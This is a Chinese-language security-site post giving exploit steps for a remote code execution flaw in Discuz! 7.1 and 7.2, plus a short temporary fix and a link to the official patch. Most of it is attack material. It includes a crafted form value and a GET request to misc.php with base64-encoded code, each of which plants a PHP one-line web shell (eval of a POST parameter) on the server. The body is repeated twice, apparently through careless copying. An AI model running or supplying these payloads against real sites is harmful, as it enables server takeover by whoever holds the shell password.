discuz!7.1、7.2 远程代码执行漏洞exp
第一种方法:
先注册个用户然后把
chr解码后是:value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');
里面有个提交地址改下,保存html
打开点提交,会生产forumdata/cache/usergroup_01.php一句话文件,密码是cmd
第二种方法:
直接GET,利用语句:
misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}
在根目录生成C.PHP密码是C
临时修补方法:
在common.inc.php上面加上
$response=$scriptlang=array();
官方发布修补补丁:
http://www.discuz.net/thread-1537673-1-1.html
注:使用exp的话仅限本机测试,其他用途后果自负!
先注册个用户然后把
chr解码后是:value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');
里面有个提交地址改下,保存html
打开点提交,会生产forumdata/cache/usergroup_01.php一句话文件,密码是cmd
第二种方法:
直接GET,利用语句:
misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}
在根目录生成C.PHP密码是C
临时修补方法:
在common.inc.php上面加上
$response=$scriptlang=array();
官方发布修补补丁:
http://www.discuz.net/thread-1537673-1-1.html
注:使用exp的话仅限本机测试,其他用途后果自负!
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/loudongfenxi/149542.html